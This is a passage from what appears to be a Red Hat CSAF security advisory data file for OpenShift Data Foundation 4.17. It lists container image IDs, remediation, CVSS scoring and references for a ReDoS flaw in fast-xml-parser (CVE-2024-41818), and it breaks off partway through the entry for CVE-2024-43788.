"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-41818", }, { category: "external", summary: "RHBZ#2300499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300499", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-41818", url: "https://www.cve.org/CVERecord?id=CVE-2024-41818", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-41818", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-41818", }, { category: "external", summary: "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10", url: "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10", }, { category: "external", summary: "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164", url: "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164", }, { category: "external", summary: "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v", url: "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v", }, ], release_date: "2024-07-28T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "fast-xml-parser: ReDOS at currency parsing in currency.js", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", 